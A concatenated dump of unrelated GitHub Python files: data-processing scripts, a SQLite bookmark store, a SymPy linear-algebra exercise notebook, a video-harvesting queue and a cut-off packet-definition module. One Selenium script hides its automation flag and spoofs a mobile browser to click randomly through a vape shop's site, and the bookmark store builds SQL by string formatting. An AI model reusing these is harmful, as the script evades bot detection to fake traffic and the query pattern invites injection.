\"word_audio\": info.get(\"wordAudio\", \"\"),\n            \"phonetic_en_audio\": info.get(\"phoneticEnAudio\", \"\"),\n            \"phonetic_us_audio\": info.get(\"phoneticUsAudio\", \"\"),\n            \"noun_plurals\": info.get(\"nounPlurals\", \"\"),\n            \"verb\": info.get(\"verb\", \"\"),\n            \"third_singular\": info.get(\"thirdSingular\", \"\"),\n            \"preterit\": info.get(\"preterit\", \"\"),\n            \"present_participle\": info.get(\"presentParticiple\", \"\"),\n            \"past_participle\": info.get(\"pastParticiple\", \"\"),\n            \"adjective\": info.get(\"adjective\", \"\"),\n            \"comparative_degree\": info.get(\"comparativeDegree\", \"\"),\n            \"superlative_degree\": info.get(\"superlativeDegree\", \"\"),\n            \"word_status\": 1\n        }\n        word_args = list(word.values())\n        word_id = 000000\n\n        examples = info.get(\"examples\", [])\n        example_args = []\n        for example in examples:\n            example_args.append([word_id, example[\"en\"], example[\"cn\"]])\n\n        logger.info(f\"Finished writing data, row_num: {row_num}\")\n\n\nSQL_INSERT_EN_WORD = \"\"\"\n\n\"\"\"\n\nSQL_INSERT_EN_WORD_EXAMPLE = \"\"\"\n\n\"\"\"\n","repo_name":"SanfordLuo/tool-demos","sub_path":"tuling-tool/insert_en_word.py","file_name":"insert_en_word.py","file_ext":"py","file_size_in_byte":2769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40261365886","text":"import json\n\ndef read_jsonl_file(filename):\n    return [json.loads(line) for line in open(filename, \"r\")]\n\ndef write_jsonl_file(data, filename):\n    with open(filename, \"w\") as fw:\n        for d in data:\n            fw.write(json.dumps(d, ensure_ascii=False) + \"\\n\")\n\nif __name__ == \"__main__\":\n    src = 'data/proposal.jsonl'\n    tgt = 'data/result/result.txt'\n\n    src_data = read_jsonl_file(src)\n\n    with open(tgt, 'r') as t:\n        tgt_data = t.readlines()\n    summ = {}\n    for i in range(100):\n        summ[i] = []\n\n    for s, t in zip(src_data, tgt_data):\n        id = s['id']\n        \n        t = t.strip('\\n')\n        summ[id].append(t)\n\n    f_write = 'data/test.jsonl'\n    data_todo = read_jsonl_file(f_write)\n\n    for i in range(len(data_todo)):\n        data_todo[i]['summary'] = summ[i]\n    \n    f = 'data/result/result.jsonl'\n    write_jsonl_file(data_todo, f)\n\n","repo_name":"Aliciaa-svg/NLP-Project","sub_path":"process_test_result.py","file_name":"process_test_result.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"44332847555","text":"import logging\nimport sqlite3\n\n\nlogger = logging.getLogger()\n\nBOOKMARKS_TABLE = \"bookmarks\"\n\n\ndef sql_escape(text):\n    if not text:\n        return text\n    return text.replace(\"'\", \"''\")\n\n\nclass Sqlite:\n    def __init__(self, db_filename):\n        self.db_filename = 
db_filename\n logger.info(\"DB filename = %s\", self.db_filename)\n\n self._create_tables_if_not_exists()\n\n def _connect(self):\n conn = sqlite3.connect(self.db_filename)\n return conn, conn.cursor()\n\n @classmethod\n def _close(cls, conn):\n conn.commit()\n conn.close()\n\n def _create_tables_if_not_exists(self):\n conn, cursor = self._connect()\n bookmarks_table = \\\n f\"CREATE TABLE IF NOT EXISTS {BOOKMARKS_TABLE} (\" \\\n \"id integer PRIMARY KEY,\" \\\n \"title text NOT NULL,\" \\\n \"description text,\" \\\n \"url text NOT NULL,\" \\\n \"section text\" \\\n \");\"\n cursor.execute(bookmarks_table)\n Sqlite._close(conn)\n\n def read_all_bookmarks(self):\n \"\"\"\n description (optional field) should be None if missing from the db.\n\n Returns:\n list of dict (each dict is a record from the db)\n \"\"\"\n conn, cursor = self._connect()\n bookmarks = []\n\n try:\n records = cursor.execute(f\"SELECT * FROM {BOOKMARKS_TABLE};\")\n except Exception as e:\n Sqlite._close(conn)\n raise e\n\n for record in records:\n # check if description is not empty and not None\n # (in sqlite, missing field is returned as \"None\" string)\n description = None\n if record[2] and record[2] != \"None\":\n description = record[2]\n\n bookmarks.append(\n {\n \"id\": record[0],\n \"title\": record[1],\n \"description\": description,\n \"url\": record[3],\n \"section\": record[4],\n }\n )\n Sqlite._close(conn)\n return bookmarks\n\n def add_bookmark(self, title, description, url, section):\n conn, cursor = self._connect()\n try:\n cursor.execute(f\"INSERT INTO {BOOKMARKS_TABLE} (title, description, url, section) \"\n f\"VALUES ('{sql_escape(title)}', \"\n f\"'{sql_escape(description)}', \"\n f\"'{sql_escape(url)}', \"\n f\"'{sql_escape(section)}');\")\n finally:\n Sqlite._close(conn)\n\n def delete_bookmark(self, bookmark_id):\n \"\"\"\n Args:\n bookmark_id (int): no need to escapse\n \"\"\"\n rows_deleted = 0\n conn, cursor = self._connect()\n try:\n cursor.execute(f\"DELETE FROM {BOOKMARKS_TABLE} WHERE id=?;\", (bookmark_id, ))\n rows_deleted = cursor.rowcount\n finally:\n Sqlite._close(conn)\n return rows_deleted == 1\n","repo_name":"eranfrie/Bookmarker","sub_path":"src/data/sqlite.py","file_name":"sqlite.py","file_ext":"py","file_size_in_byte":3002,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"22571172622","text":"def cells():\n '''\n # 2/ Exercise solutions\n '''\n\n '''\n '''\n\n # setup SymPy\n from sympy import *\n x, y, z, t = symbols('x y z t')\n init_printing()\n\n '''\n '''\n\n\n '''\n '''\n\n '''\n ## Definitions\n '''\n\n '''\n '''\n\n '''\n ### E2.1\n \n Find the inverse matrix $A^{-1}$ for the matrix $A=\\begin{bsmallmatrix}7 & 0 \\\\ 0 & 2\\end{bsmallmatrix}$. Verify that $A^{-1}(A\\vec{v})=\\vec{v}$ for any vector $\\vec{v} = \\begin{bsmallmatrix} v_1 \\\\ v_2\\end{bsmallmatrix}$. \n \n #### Answer\n $A^{-1} = \\begin{bsmallmatrix}\\frac{1}{7} & 0 \\\\ 0 & \\frac{1}{2}\\end{bsmallmatrix}$.\n \n #### Solution\n To find $A^{-1}$ we must consider the action of $A=\\begin{bsmallmatrix}7 & 0 \\\\ 0 & 2\\end{bsmallmatrix}$ on an arbitrary vector $\\vec{v}=\\begin{bsmallmatrix}v_1 \\\\ v_2\\end{bsmallmatrix}$, and perform the inverse action. Since $A$ multiplies the first component by $7$, $A^{-1}$ must divide the first component by $7$. Since $A$ multiplies the second component by $2$, $A^{-1}$ must divide the second component by $2$. Thus $A^{-1} = \\begin{bsmallmatrix}\\frac{1}{7} & 0 \\\\ 0 & \\frac{1}{2}\\end{bsmallmatrix}$. 
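A quick check in SymPy (already imported at the top of this notebook): `Matrix([[7, 0], [0, 2]]).inv()` returns exactly this matrix. 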
\n '''\n\n '''\n '''\n\n A = ...\n\n '''\n '''\n\n\n '''\n '''\n\n '''\n ### E2.2\n '''\n\n '''\n '''\n\n '''\n Given the matrices $A=\\begin{bsmallmatrix}1 & 3 \\\\ 4 & 5\\end{bsmallmatrix}$ and $B=\\begin{bsmallmatrix} -1 & 0 \\\\ 3 & 3 \\end{bsmallmatrix}$, and the vectors $\\vec{v}=\\begin{bsmallmatrix}1 \\\\ 2\\end{bsmallmatrix}$ and $\\vec{w}=\\begin{bsmallmatrix}-3 \\\\ -4\\end{bsmallmatrix}$, compute the following expressions. \n \n \n - a) $A\\vec{v}$\n - b) $B\\vec{v}$\n - c) $A(B\\vec{v})$\n - d) $B(A\\vec{v})$\n - e) $A\\vec{w}$\n - f) $B\\vec{w}$\n '''\n\n '''\n '''\n\n # define the matrices A and B, and the vecs v and w\n A = Matrix([[1,3], # 2x2 matrix A\n [4,5]])\n B = Matrix([[-1,0], # 2x2 matrix B\n [ 3,3]])\n v = Matrix([1,2]) # 2x1 column vector v\n w = Matrix([-3,-4]) # 2x1 column vector w\n\n '''\n '''\n\n # a)\n A*v\n\n '''\n '''\n\n # b)\n B*v\n\n '''\n '''\n\n # c)\n A*B*v\n\n '''\n '''\n\n # d)\n B*A*v\n\n '''\n '''\n\n # e)\n A*w\n\n '''\n '''\n\n # f)\n B*w\n\n '''\n '''\n\n '''\n ### E2.3\n \n Find the components $v_1$ and $v_2$ of the vector $\\vec{v} =\\begin{bsmallmatrix}v_1 \\\\ v_2\\end{bsmallmatrix}$ so that $E\\vec{v} = 3 \\vec{e}_2 - 2\\vec{e}_1$, where $E$ is the following matrix:\n \n $$\n E\n = \\;\n \\begin{bmatrix}\n | & | \\\\\n \\vec{e}_1 & \\vec{e}_2 \\\\\n | & | \n \\end{bmatrix}\\!.\n $$\n \n \n #### Answer\n $v_1=-2$, $v_2=3$.\n '''\n\n '''\n '''\n\n\n '''\n '''\n\n\n '''\n '''\n\n '''\n ## Vector operations\n '''\n\n '''\n '''\n\n '''\n ### E2.4\n \n Given the vectors $\\vec{u}=(1,1,0)$ and $\\vec{v}=(0,0,3)$, compute the following vector expressions: \n **a)** $\\vec{u}+\\vec{v}$ **b)** $\\vec{u}-\\vec{v}$ **c)** $3\\vec{u}+\\vec{v}$ **d)** $\\| \\vec{u} \\|$\n \n \n #### Answer\n **a)** $(1,1,3)$; **b)** $(1,1,-3)$; **c)** $(3,3,3)$; **d)** $\\sqrt{2}$.\n '''\n\n '''\n '''\n\n\n '''\n '''\n\n\n '''\n '''\n\n '''\n ### E2.5\n \n Given $\\vec{v}= (1, 2, 3)$ and $\\vec{w}=(0, 1, 1)$, compute the following vector products:\n \n - **a)** $\\vec{v} \\cdot \\vec{w}$;\n - **b)** $\\vec{v} \\times \\vec{w}$;\n - **c)** $\\vec{w} \\times \\vec{v}$;\n - **d)** $\\vec{w} \\times \\vec{w}$. \n \n #### Answer\n **a)** $5$; **b)** $(-1, -1, 1)$; **c)** $(1,1,-1)$; **d)** $(0, 0, 0)$.\n '''\n\n '''\n '''\n\n\n '''\n '''\n\n\n '''\n '''\n\n '''\n ### E2.6 \n \n \n For each of the following vectors, $\\vec{v}_1 = 10\\angle 10^{\\circ}$, $\\vec{v}_2 = 10\\angle 30^{\\circ}$, $\\vec{v}_3 = 10\\angle 60^{\\circ}$, $\\vec{v}_4 = 10\\angle 120^{\\circ}$, complete the following tasks: \n \n - a) Draw the vector in a Cartesian plane. \n - b) Compute the vector's $x$- and $y$-coordinates. \n - c) Compute the projection of the vector in the direction $\\hat{\\imath}$. Your answer should be a vector quantity. \n - d) Compute the projection of the vector in the direction $\\hat{\\jmath}$. \n - e) Compute the projection of the vector in the direction $\\vec{d}=(1,1)$, and find the length of the projection. \n \n **Hint**: Recall the formula for the projection of the vector $\\vec{v}$ in the direction $\\vec{d}$ is defined as $\\Pi_{\\vec{d}}(\\vec{v}) = \\Big(\\frac{ \\vec{d}\\,\\cdot \\, \\vec{v} }{ \\|\\vec{d}\\|^2 } \\Big) \\vec{d}$. \n \n #### Answer\n \n \n - a) This part has been omitted for brevity. \n - b) $\\vec{v}_1 = (9.848, 1.736)$; $\\vec{v}_2 = (8.66, 5)$; $\\vec{v}_3 = (5, 8.66)$; $\\vec{v}_4 = (-5, 8.66)$. 
\n - c) $\\Pi_{\\hat{\\imath}}(\\vec{v}_1) = 9.848$; $\\Pi_{\\hat{\\imath}}(\\vec{v}_2) = 8.66$; $\\Pi_{\\hat{\\imath}}(\\vec{v}_3) = 5$; $\\Pi_{\\hat{\\imath}}(\\vec{v}_4) = -5$. \n - d) $\\Pi_{\\hat{\\jmath}}(\\vec{v}_1) = 1.736$; $\\Pi_{\\hat{\\jmath}}(\\vec{v}_2) = 5$; $\\Pi_{\\hat{\\jmath}}(\\vec{v}_3) = 8.66$; $\\Pi_{\\hat{\\jmath}}(\\vec{v}_4) = 8.66$. \n - e) $\\Pi_{\\vec{d}}(\\vec{v}_1) = (5.79, 5.79)$ and $\\| \\Pi_{\\vec{d}}(\\vec{v}_1) \\| = 8.19$; $\\Pi_{\\vec{d}}(\\vec{v}_2) = (6.83,6.83)$ and $\\| \\Pi_{\\vec{d}}(\\vec{v}_2) \\| = 9.66$; $\\Pi_{\\vec{d}}(\\vec{v}_3) = (6.83,6.83)$ and $\\| \\Pi_{\\vec{d}}(\\vec{v}_3) \\| = 9.66$; $\\Pi_{\\vec{d}}(\\vec{v}_4) = (1.83,1.83)$ and $\\| \\Pi_{\\vec{d}}(\\vec{v}_4) \\| = 2.59$. \n '''\n\n '''\n '''\n\n\n '''\n '''\n\n\n '''\n '''\n\n '''\n ## Matrix operations\n '''\n\n '''\n '''\n\n '''\n ### E2.7\n \n \n Given the matrices $A = \\begin{bsmallmatrix} 3 & 4 \\\\ 2 & 1 \\end{bsmallmatrix}$, $B = \\begin{bsmallmatrix} -1 & 0 & 1 & 2 \\\\ 4 & 3 & 2 & 1 \\end{bsmallmatrix}$, and $C = \\begin{bsmallmatrix} -2 & 3 & \\,0 \\\\ 2 & \\!-2 & \\,1\\end{bsmallmatrix}$, compute the expressions. \n \n - a) $A^{\\mathsf{T}}$\n - b) $C^{\\mathsf{T}}$\n - c) $A^2$\n - d) $AB$\n - e) $AC$\n - f) $BA$\n - g) $C^{\\mathsf{T}} \\!A$\n - h) $\\det(A)$\n - i) $\\det(B)$\n - j) $\\det(C)$\n - k) $\\det(A^{\\mathsf{T}})$\n - l) $\\det(AA^{-1})$\n - m) $\\textup{Tr}(A)$\n - n) $\\textup{Tr}(A^{\\mathsf{T}})$\n \n **Hint**: Some of these expressions may not exist. \n \n #### Answer\n \n \n - a) $\\begin{bsmallmatrix}3 & 2\\\\ 4 & 1\\end{bsmallmatrix}$; \n - b) $\\begin{bsmallmatrix}-2 & 2\\\\3 & -2\\\\0 & 1\\end{bsmallmatrix}$; \n - c) $\\begin{bsmallmatrix}17 & 16\\\\8 & 9\\end{bsmallmatrix}$; \n - d) $\\begin{bsmallmatrix}13 & 12 & 11 & 10\\\\2 & 3 & 4 & 5\\end{bsmallmatrix}$; \n - e) $\\begin{bsmallmatrix}2 & 1 & 4\\\\-2 & 4 & 1\\end{bsmallmatrix}$; \n - f) Doesn't exist; \n - g) $\\begin{bsmallmatrix}-2 & -6\\\\5 & 10\\\\2 & 1\\end{bsmallmatrix}$; \n - h) $-5$; \n - i) Doesn't exist; \n - j) Doesn't exist; \n - k) $-5$; \n - l) $1$; \n - m) $4$; \n - n) $4$. \n '''\n\n '''\n '''\n\n\n '''\n '''\n\n\n '''\n '''\n\n '''\n ### E2.8\n \n Given the $1\\times 3$ matrices (row vectors) $\\vec{u} = (1,2,3)$ and $\\vec{v} = (2,-1,0)$, compute the following products: \n \n - a) $\\vec{u}\\,\\vec{u}^{\\mathsf{T}}$\n - b) $\\vec{v}\\,\\vec{v}^{\\mathsf{T}}$\n - c) $\\vec{u}\\,\\vec{v}^{\\mathsf{T}}$\n - d) $\\vec{u}^{\\mathsf{T}} \\vec{u}$\n - e) $\\vec{v}^{\\mathsf{T}} \\vec{v}$\n - f) $\\vec{u}^{\\mathsf{T}} \\vec{v}$\n \n **Hint**: The transpose of a $1 \\times 3$ row vector is a $3\\times 1$ column vector. \n \n #### Answer\n \n \n - a) $14$; \n - b) $5$; \n - c) $0$; \n - d) $\\begin{bsmallmatrix}1 & 2 & 3\\\\2 & 4 & 6\\\\3 & 6 & 9\\end{bsmallmatrix}$; \n - e) $\\begin{bsmallmatrix}4 & -2 & 0\\\\-2 & 1 & 0\\\\0 & 0 & 0\\end{bsmallmatrix}$; \n - f) $\\begin{bsmallmatrix}2 & -1 & 0\\\\4 & -2 & 0\\\\6 & -3 & 0\\end{bsmallmatrix}$. \n '''\n\n '''\n '''\n\n\n '''\n '''\n\n\n '''\n '''\n\n '''\n ### E2.9\n \n Find the unknowns $\\alpha$ and $\\beta$ in the equation $\\begin{bsmallmatrix}2 & \\alpha \\\\ \\beta & -3\\end{bsmallmatrix}\n \\begin{bsmallmatrix}1 \\\\[0.5mm] 4\\end{bsmallmatrix}=\\begin{bsmallmatrix}0 \\\\[0.5mm] 0\\end{bsmallmatrix}$. 
\n    \n    #### Answer\n    $\alpha=-\frac{1}{2}$ and $\beta = 12$.\n    '''\n\n\n    '''\n    '''\n\n\n    '''\n    '''\n\n    '''\n    ## Linearity\n    '''\n\n    '''\n    '''\n\n    '''\n    ### E2.10\n    \n    Are these expressions linear in the variables $x$, $y$, and $z$?\n    \n    - a) $2x+5y + \sqrt{m}z$\n    - b) $10\sqrt{x} + 2(y+z)$\n    - c) $42x + a^2\sin(\frac{\pi}{3})y + z\cos(\frac{\pi}{3})$\n    \n    #### Answer\n    \n    \n    - a) Yes; \n    - b) No; \n    - c) Yes. \n    \n    #### Solution\n    An expression is linear in the variable $v$ if it contains $v$ raised only to the first power. This is the case for the first and third expressions but not the second, since it contains $\sqrt{x} = x^{\frac{1}{2}}$. \n    '''\n\n    '''\n    '''\n\n    x, y, z, m, a = symbols('x y z m a')\n    alpha, beta, gamma = symbols(r'\alpha \beta \gamma')\n\n    '''\n    '''\n\n    # a)\n    expra = 2*x + 5*y + sqrt(m)*z\n    expra.subs({\"x\":alpha*x, \"y\":0, \"z\":0}) == alpha*expra.subs({\"x\":x, \"y\":0, \"z\":0})\n\n    '''\n    '''\n\n    '''\n    So `expra` is linear in $x$.\n    '''\n\n    '''\n    '''\n\n    expra.subs({\"x\":0, \"y\":beta*y, \"z\":0}) == beta * expra.subs({\"x\":0, \"y\":y, \"z\":0})\n\n    '''\n    '''\n\n    ...\n\n    '''\n    '''\n\n","repo_name":"minireference/noBSLAnotebooks","sub_path":"aspynb/chapter02_exercises.py","file_name":"chapter02_exercises.py","file_ext":"py","file_size_in_byte":9398,"program_lang":"python","lang":"en","doc_type":"code","stars":141,"dataset":"github-code","pt":"53"} +{"seq_id":"70827716008","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\n# from selenium.webdriver.chrome.options import Options as COptions\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import NoAlertPresentException\nfrom selenium.webdriver.support.ui import WebDriverWait\nimport random\nfrom random import gauss\nimport time\nimport re\nimport sys\n\noptions = webdriver.ChromeOptions()\noptions.accept_untrusted_certs = True\noptions.assume_untrusted_cert_issuer = True\noptions.add_experimental_option(\"excludeSwitches\", [\"enable-automation\"])\noptions.add_argument(f\"--user-agent=Mozilla/5.0 (Linux; Android 8.0.0; PRA-TL10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36\")\noptions.add_argument(f\"--window-size=1080,1920\")\noptions.add_argument(\"--disable-extensions\")\noptions.add_argument(\"--disable-infobars\")\noptions.add_argument(\"--disable-popup-blocking\")\noptions.add_argument(\"--ignore-certificate-errors\")\noptions.add_argument(\"--disable-session-crashed-bubble\")\noptions.add_argument(\"--enable-javascript\")\noptions.add_argument(\"--cache-control=max-age=0\")\n\nchrome = webdriver.Remote(\n    command_executor=f'http://localhost:4444/wd/hub',\n    desired_capabilities=options.to_capabilities())\nchrome.implicitly_wait(30)\ntime.sleep(abs((gauss(1, 1) * 550 + 3500))/1000)\nchrome.get(\"https://vapejuicedepot.com/products/fogg-pod-juice-jewel-mint-disposable-pod\")\n\nelement = chrome.find_elements_by_id(\"bouncer_modal_submit\")\nif len(element) > 0 and element[0].is_displayed(): \n    element[0].click()\nelse: \n    time.sleep(1)\nchrome.execute_script(\"window.scrollTo(0, 2000)\") \ntime.sleep(3) 
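\n# Sketch (not part of the original flow): WebDriverWait, imported above, could\n# replace these fixed sleeps with an explicit wait, e.g.\n#   WebDriverWait(chrome, 10).until(lambda d: d.find_element_by_id(\"section-header\"))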
\nchrome.execute_script(\"window.scrollTo(0, 20)\")\ntime.sleep(3)\nmenu_list = [\"NEW ARRIVALS\",\"E-LIQUIDS\",\"DEVICES\",\"E-LIQUIDS\",\"ALL BRANDS\",\"DEALS & SALE\",\"CONTACT US\",\"HOME\"]\nmenu_item = random.choice(menu_list)\nprint(menu_item)\ntime.sleep(3)\nchrome.find_element_by_xpath('//*[@id=\"section-header\"]/div/div[1]/button').click()\ntime.sleep(10)\nchrome.find_element_by_xpath(f\"//a[text()='{menu_item}']\").click()\ntime.sleep(10) \nchrome.execute_script(\"window.scrollTo(0, 2000)\")\ntime.sleep(10)\nchrome.execute_script(\"window.scrollTo(0, 20)\")\ntime.sleep(10)","repo_name":"babkenmes/crawler","sub_path":"selenium/node_scripts/tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30871479728","text":"import os\nfrom rq import Queue\nfrom redis import Redis\n\nfrom shows import shows_dict, vod_base_url, base_url, get_available_episodes\n#from shows import shows_dict, vod_base_url, base_url, get_parsed_html, search_for_links\nfrom web_driver_dependencies import *\nfrom general_utils import force_quit_browser_silently, db_connect\nfrom download_helpers import async_logic, check_if_show_is_needed\n\n\nredis_conn = Redis(host=os.environ[\"REDIS_HOST\"], port=6379)\nq = Queue(connection=redis_conn)\n\ndef main():\n\n for show, directory in shows_dict.items():\n # Create webdriver\n #driver = webdriver.Chrome(DRIVER_LOCATION, chrome_options=chrome_options)\n driver = webdriver.Chrome(options=chrome_options)\n\n # Open web page\n driver.get(vod_base_url+show)\n\n # Parse web page and grab html block that has relevant urls\n print(\"Looking For Episodes of:\", shows_dict[show])\n print(vod_base_url+show +\"\\n\") # This maybe needs to go in the parser.\n episodes = get_available_episodes(show, vod_base_url, base_url, driver)\n \n # Close webdriver\n driver.quit()\n\n if not episodes:\n continue\n\n # Search for existence of show in database. 
If not found, download.\n for episode in episodes:\n if check_if_show_is_needed(show, episode):\n print(\"[ ]:\", episode['title'])\n # Start download, write nfo and add to database.\n q.enqueue_call(func=async_logic,\n args=(show, episode),\n timeout=\"10m\")\n else:\n print(\"[x]:\", episode['title'])\n\n print(\"\\n\")\n\n driver.quit()\n #force_quit_browser_silently()\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n exit()\n except Exception as e:\n print(\"Main Exception Catcher\")\n print(str(e))\n print('Exception caught, type is:', e.__class__.__name__)\n force_quit_browser_silently()\n exit()\n","repo_name":"sulaiman-allen/video_harvester","sub_path":"video_harvester.py","file_name":"video_harvester.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18598647935","text":"# encoding: utf-8\n\nimport math\nimport inspect\nimport types\nimport struct\nimport sys\n\nimport position\nfrom binarizer import *\nfrom definitions import *\n\n\n\n\n# Atari 256 color palette\nCOLORS = [\"#000000\", \"#412000\", \"#451904\", \"#5d1f0c\", \"#4a1700\", \"#490036\", \"#48036c\", \"#051e81\", \"#0b0779\", \"#1d295a\", \"#004b59\", \"#004800\", \"#164000\", \"#2c3500\", \"#463a09\", \"#401a02\",\n \"#252525\", \"#542800\", \"#721e11\", \"#7a240d\", \"#721f00\", \"#66004b\", \"#5c0488\", \"#0626a5\", \"#201c8e\", \"#1d3876\", \"#005d6e\", \"#005400\", \"#1c5300\", \"#384400\", \"#4d3f09\", \"#581f05\",\n \"#343434\", \"#763700\", \"#9f241e\", \"#982c0e\", \"#a81300\", \"#80035f\", \"#650d90\", \"#082fca\", \"#3531a3\", \"#1d4892\", \"#006f84\", \"#036b03\", \"#236600\", \"#445200\", \"#544509\", \"#702408\",\n \"#4e4e4e\", \"#9a5000\", \"#b33a20\", \"#b02f0f\", \"#c8210a\", \"#950f74\", \"#7b23a7\", \"#263dd4\", \"#4642b4\", \"#1d5cac\", \"#00849c\", \"#0e760e\", \"#287800\", \"#495600\", \"#6c5809\", \"#8d3a13\",\n \"#686868\", \"#c36806\", \"#c85120\", \"#bf3624\", \"#df2512\", \"#aa2288\", \"#933bbf\", \"#444cde\", \"#5753c5\", \"#1d71c6\", \"#0099bf\", \"#188018\", \"#2e8c00\", \"#607100\", \"#907609\", \"#ab511f\",\n \"#757575\", \"#e47b07\", \"#e36920\", \"#d34e2a\", \"#ec3b24\", \"#ba3d99\", \"#9d45c9\", \"#4f5aec\", \"#615dcf\", \"#3286cf\", \"#00abca\", \"#279227\", \"#3a980c\", \"#6c7f00\", \"#ab8b0a\", \"#b56427\",\n \"#8e8e8e\", \"#ff911a\", \"#fc8120\", \"#e7623e\", \"#fa5236\", \"#ca4da9\", \"#a74fd3\", \"#5a68ff\", \"#6d69db\", \"#489bd9\", \"#00bcde\", \"#36a436\", \"#47a519\", \"#798d0a\", \"#c1a120\", \"#bf7730\",\n \"#a4a4a4\", \"#ffab1d\", \"#fd8c25\", \"#f36e4a\", \"#fc6148\", \"#d75ab6\", \"#b25ade\", \"#6575ff\", \"#7b77e9\", \"#4ea8ec\", \"#00d0f5\", \"#4eb94e\", \"#51af23\", \"#8b9f1c\", \"#d0b02f\", \"#d0853a\",\n \"#b8b8b8\", \"#ffc51f\", \"#fe982c\", \"#fd7854\", \"#ff705f\", \"#e467c3\", \"#bd65e9\", \"#7183ff\", \"#8985f7\", \"#55b6ff\", \"#10dcff\", \"#51cd51\", \"#5cba2e\", \"#9eb22f\", \"#debe3d\", \"#e19344\",\n \"#c5c5c5\", \"#ffd03b\", \"#ffae38\", \"#ff8a6a\", \"#ff7e7e\", \"#ef72ce\", \"#c56df1\", \"#8091ff\", \"#918dff\", \"#69caff\", \"#3ee1ff\", \"#72da72\", \"#71cf43\", \"#abbf3c\", \"#e6c645\", \"#eda04e\",\n \"#d0d0d0\", \"#ffd84c\", \"#ffb946\", \"#ff987c\", \"#ff8f8f\", \"#fb7eda\", \"#ce76fa\", \"#90a0ff\", \"#9c98ff\", \"#74cbff\", \"#64e7ff\", \"#7ce47c\", \"#85e357\", \"#b8cc49\", \"#edcd4c\", \"#f9ad58\",\n \"#d7d7d7\", \"#ffe651\", \"#ffbf51\", \"#ffa48b\", \"#ff9d9e\", \"#ff8de1\", \"#d583ff\", \"#97a9ff\", 
\"#a7a4ff\", \"#82d3ff\", \"#76eaff\", \"#85ed85\", \"#8deb5f\", \"#c2d653\", \"#f5d862\", \"#fcb75c\",\n          \"#e1e1e1\", \"#fff456\", \"#ffc66d\", \"#ffb39e\", \"#ffabad\", \"#ff9de5\", \"#da90ff\", \"#9fb2ff\", \"#b2afff\", \"#8ddaff\", \"#8bedff\", \"#99f299\", \"#97f569\", \"#cde153\", \"#fbe276\", \"#ffc160\",\n          \"#eaeaea\", \"#fff970\", \"#ffd587\", \"#ffc2b2\", \"#ffb9bd\", \"#ffa5e7\", \"#de9cff\", \"#afbeff\", \"#bbb8ff\", \"#9fd4ff\", \"#9aefff\", \"#b3f7b3\", \"#a0fe72\", \"#dbef6c\", \"#fcee98\", \"#ffca69\",\n          \"#f4f4f4\", \"#ffff90\", \"#ffe498\", \"#ffd0c3\", \"#ffc7ce\", \"#ffafea\", \"#e2a9ff\", \"#c0cbff\", \"#c3c1ff\", \"#b4e2ff\", \"#b1f3ff\", \"#c3f9c3\", \"#b1ff8a\", \"#e8fc79\", \"#fdf3a9\", \"#ffcf7e\",\n          \"#ffffff\", \"#ffffaa\", \"#ffe6ab\", \"#ffdad0\", \"#ffcade\", \"#ffb8ec\", \"#e6b6ff\", \"#cdd3ff\", \"#d3d1ff\", \"#c0ebff\", \"#c7f6ff\", \"#cdfccd\", \"#bcff9a\", \"#f2ffab\", \"#fdf3be\", \"#ffda96\"]\n\n\n\n\n################################################################################\n# Specific item types\n\n\n\n\nclass ShortAsFloat(Float):\n\n    C_TYPE = 'h'\n    DESCRIPTION = \"4-byte real (float) stored in a 2-byte short, scaled by 10000\"\n\n    def __init__(self, default_value, description = None):\n        AbstractItem.__init__(self, default_value, description)\n\n\n    def serialize(self, value, buf):\n        buf.append(int(value * 10000.0))\n\n\n    def deserialize(self, iterator):\n        return float(next(iterator)) / 10000.0\n\n\n\n\nclass Point(Struct):\n\n    DESCRIPTION = \"Field coordinates\"\n\n    def __init__(self, description = None):\n        Struct.__init__(self, position.Pose, description,\n            ('x', ShortAsFloat(0.0, \"X coordinate\")),\n            ('y', ShortAsFloat(0.0, \"Y coordinate\")),\n        )\n\n\n\n\nclass Pose(Struct):\n\n    DESCRIPTION = \"Pose\"\n\n    def __init__(self, description = None):\n        Struct.__init__(self, position.Pose, description,\n            ('x', Float(0.0, \"X coordinate\")),\n            ('y', Float(0.0, \"Y coordinate\")),\n            ('angle', Float(0.0, \"Angle\")),\n        )\n\n\n\n\nclass OptionalAngle(AbstractItem):\n\n    C_TYPE = 'Bf'\n    DESCRIPTION = \"Optional angle\"\n\n    def __init__(self, default_value, description = None):\n        AbstractItem.__init__(self, default_value, description)\n\n\n    def serialize(self, value, buf):\n        if value is not None:\n            buf.append(1)\n            buf.append(value)\n        else:\n            buf.append(0)\n            buf.append(-1100000.0)\n\n\n    def deserialize(self, iterator):\n        use_angle = next(iterator)\n        angle = next(iterator)\n        if not use_angle:\n            angle = None\n        return angle\n\n\n    def to_dump(self, value):\n        if value is None:\n            return str(None)\n        return \"{:0.4f}\".format(value)\n\n\n\n\n################################################################################\n# Base packet class\n\n\n\n\nclass BasePacket(object):\n\n    MAX_SIZE = 256\n    DEFINITION = ()\n    DESCRIPTION = \"\"\n    LOGVIEW_DEFAULT_ENABLED = True\n    STRUCT = None\n    BIN_STRUCT = None\n    HANDLER_METHODS = None\n\n    @classmethod\n    def static_init(cls):\n        if cls.STRUCT is None:\n            cls.BIN_STRUCT = Struct(StructInstance, \"\", *cls.DEFINITION)\n            fmt = \"<B\" + cls.BIN_STRUCT.C_TYPE\n            pad_size = cls.MAX_SIZE - struct.calcsize(fmt)\n            if pad_size > 0:\n                fmt += 